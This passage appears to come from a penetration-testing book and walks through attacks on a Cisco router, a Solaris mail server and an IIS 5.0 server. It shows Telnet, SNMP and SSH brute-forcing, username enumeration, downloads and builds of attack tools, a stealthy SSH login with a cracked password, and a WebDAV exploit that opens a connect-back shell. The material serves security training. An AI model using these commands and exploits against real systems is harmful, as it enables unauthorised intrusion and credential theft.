14.4 Network Service Testing

After investigating the potential low-level weaknesses within each accessible network service, I launch exploit scripts and attack techniques against each service to qualify and test the vulnerabilities.

14.4.1 Cisco IOS Router (

The router is susceptible to brute-force attack through its Telnet and SNMP services. A full-blown brute-force attack (which often takes days to complete) should be launched if initial brute-force attacks, using obvious common passwords, fail. Example 14-17 shows hydra in use to brute-force the Cisco IOS Telnet service password, using a list of default Cisco passwords from pass.txt.

Example 14-17. Performing initial Telnet brute force using Hydra
# cat pass.txt










# ./hydra -P pass.txt -e ns cisco

Hydra v2.4 (c) 2003 by van Hauser / THC - use allowed only for legal purposes.

Hydra is starting! [parallel tasks: 4, login tries: 11 (l:1/p:11)]

Hydra finished.

ADMsnmp is used to brute-force SNMP service read or write community strings of the router, as shown in Example 14-18.

Example 14-18. Performing initial SNMP brute force using ADMsnmp
# ./ADMsnmp

ADMsnmp vbeta 0.1 (c) The ADM crew


greets: !ADM, el8.org, ansia

>>>>>>>>>>> get req name=root  id = 2 >>>>>>>>>>>

>>>>>>>>>>> get req name=public   id = 5 >>>>>>>>>>>

>>>>>>>>>>> get req name=private  id = 8 >>>>>>>>>>>

>>>>>>>>>>> get req name=write  id = 11 >>>>>>>>>>>

>>>>>>>>>>> get req name=admin  id = 14 >>>>>>>>>>>

>>>>>>>>>>> get req name=proxy  id = 17 >>>>>>>>>>>

>>>>>>>>>>> get req name=ascend  id = 20 >>>>>>>>>>>

>>>>>>>>>>> get req name=cisco  id = 23 >>>>>>>>>>>

>>>>>>>>>>> get req name=router  id = 26 >>>>>>>>>>>

>>>>>>>>>>> get req name=shiva  id = 29 >>>>>>>>>>>

>>>>>>>>>>> get req name=enable  id = 32 >>>>>>>>>>>

>>>>>>>>>>> get req name=read  id = 35 >>>>>>>>>>>

>>>>>>>>>>> get req name=access  id = 38 >>>>>>>>>>>

>>>>>>>>>>> get req name=snmp  id = 41 >>>>>>>>>>>

>>>>>>>>>>> get req name=cable-docsis  id = 43 >>>>>>>>>>>

>>>>>>>>>>> get req name=ILMI  id = 45 >>>>>>>>>>>

<!ADM!>         snmp check on       <!ADM!>

Unfortunately, this initial Telnet and SNMP brute-force testing reveals that no common or default passwords are in use on this router. I could launch a full-blown brute-force attacks against these services if I were desperate to compromise this device (which can take weeks to complete , depending on the size of the dictionary).

14.4.2 Solaris Mail Server (

No public exploit tools were found for the issues listed in MITRE CVE relating to Sendmail and OpenSSH services running on Solaris. In this case, there are three remote attacks that can be launched against the server.

  • Enumeration of local user accounts through Sendmail

  • Enumeration of local user accounts through OpenSSH (abusing CVE-2003-0190)

  • Brute force of weak user passwords through OpenSSH

Example 14-19 shows the rcpt2 tool (http://examples.oreilly.com/networksa/tools/rcpt2.c) in use against the Sendmail service, to identify local user accounts through multiple crafted RCPT TO: requests.

Example 14-19. Enumerating usernames through Sendmail
# ./rcpt2 users.txt

rcpt2 by B-r00t. (c) 2003.

Usernames from: users.txt

RCPT TO username enumeration on

BANNER: 220 mail ESMTP Sendmail 8.11.6+Sun/8.11.6; Thu, 20 Nov 2003

SEND: HELO doris.scriptkiddie.net

RECV: 250 mail Hello hacker [], pleased to meet you

SENT: mail from:<hax0r@doris.scriptkiddie.net>

RECV: 250 2.1.0 <hax0r@doris.scriptkiddie.net>... Sender ok


VALID_USER: sybase

Sending RSET & QUIT to

Ok Done!

Here I've identified the user accounts of root, and sybase. Example 14-20 shows how to launch a similar attack against the OpenSSH service, using ssh_brute.

Example 14-20. Downloading, building, and using ssh_brute
# wget ftp://sunsite.cnlab-switch.ch/pub/OpenBSD/OpenSSH/portable/


# tar xfz openssh-3.6.1p1.tar.gz

# wget http://examples.oreilly.com/networksa/tools/ssh_brute.tgz

# tar xvfz ssh_brute.tgz



# patch -p0 <openssh-3.6.1p1_brute.diff

patching file openssh-3.6.1p1/ssh.c

patching file openssh-3.6.1p1/sshconnect.c

patching file openssh-3.6.1p1/sshconnect1.c

patching file openssh-3.6.1p1/sshconnect2.c

# cd openssh-3.6.1p1

# ./configure

# make

# cc ../ssh_brute.c -o ssh_brute

# ./ssh_brute

 SSH_BRUTE - OpenSSH/PAM <= 3.6.1p1 remote users discovery tool

 Copyright (c) 2003 @ Mediaservice.net Srl. All rights reserved

 Usage: ./ssh_brute <protocol version> <user file> <host>

# make ssh

# ./ssh_brute 2 users.txt

 SSH_BRUTE - OpenSSH/PAM <= 3.6.1p1 remote users discovery tool

 Copyright (c) 2003 @ Mediaservice.net Srl. All rights reserved

 Testing an illegal user        : 0 second(s)

 Testing login root             : USER OK       [8 second(s)]

 Testing login test             : ILLEGAL       [0 second(s)]

 Testing login admin            : ILLEGAL       [0 second(s)]

 Testing login sybase           : USER OK       [7 second(s)]

 Testing login oracle           : ILLEGAL       [1 second(s)]

 Testing login informix         : ILLEGAL       [0 second(s)]

After identifying one interesting non-standard user account in particular (sybase), I proceed to use the TESO guess-who brute-force utility to grind the user password through the accessible SSH service. Example 14-21 shows the package being downloaded, built, and run.

Example 14-21. Installing and using guess-who
# wget http://packetstormsecurity.nl/groups/teso/guess-who-0.44.tgz

# tar xfz guess-who-0.44.tgz

# cd guess-who

# make

# ./b

guess-who SSH2 parallel passwd bruter (C) 2002 by krahmer

Usage: ./b <-l login> <-h host> [-p port] <-1|-2> [-N nthreads]

           [-n ntries]

Use -1 for producer/consumer thread model, -2 for dumb parallelism.

Passwds go on stdin. :)

# ./b -l sybase -h -1 < pass.txt

(!)128 ][ 00131 ][ 00000000.599880 ][   sybase ][        letmein ]

After 128 attempts, the tool finds that the user password is letmein. I can proceed to use ssh to authenticate and connect to the host, with the -T option to provide a level of cloaking (so that I don't appear in who listings, etc.):

# ssh -l sybase -T csh -i

sybase@'s password: letmein

Warning: no access to tty (Bad file descriptor).

Thus no job control in this shell.

mail% who

mail% id

uid=508(sybase) gid=509(sybase) groups=509(sybase)

14.4.3 Windows 2000 Web Server (

Vulnerabilities fall into two categories: simple logic flaws and memory manipulation bugs. Two of the seven relevant remote issues relating to IIS 5.0 are simple logic flaws that rely on Unicode and double-encoding of characters to perform directory traversal. The remaining five are memory manipulation bugs, which use buffer overflows to influence logical program flow on the remote server.

The Unicode and double-encoding directory traversal bugs (CVE-2000-0884 and CVE-2001-0333) can be identified using an automated web scanner, such as nikto or N-Stealth. By analyzing the results, I find that the server isn't susceptible to these issues.

The existence and scope of memory manipulation bugs can be fully qualified only by launching exploit scripts and proof-of-concept tools to solicit a positive response (such as an interactive command shell or a directory listing). It may be the case that, even though the server is vulnerable to a given bug, egress filtering of traffic prevents connect-back shellcode from working.

In the case of the IIS 5.0 web service at, the exploit scripts for the following bugs weren't successful:

  • .printer overflow

  • .ida and .idq overflow

  • .asp chunked encoding overflow

When running the KaHT exploit script to test for the presence of the ntdll.dll IIS WebDAV overflow, I see a positive response, as shown in Example 14-22.

Example 14-22. Using KaHT to compromise the IIS 5.0 server
D:\KaHT_public> KaHT 53 0

. .. ...: Webdav exploit & Scanner (aT4r@3wdesign.es) :... ...

 Checking Servers.   IP                 Connect IIS 5.0 WEBDAV

 Connecting to host:   [OK]    [OK]    [OK]

 [+] Aceptando conexiones en el puerto 53

 [+] Lets go dude =)

 [+] 1 Unhacked Servers Remaining

 [+] Trying Ip:      Ret=0x00c000c0

 [+] Trying Ip:      Ret=0x00c200c2

 [+] Incoming Conection from accepted

 [+] Press Enter to Continue. type "exit" to return to scan

Microsoft Windows 2000 [Version 5.00.2195]

(C) Copyright 1985-2000 Microsoft Corp.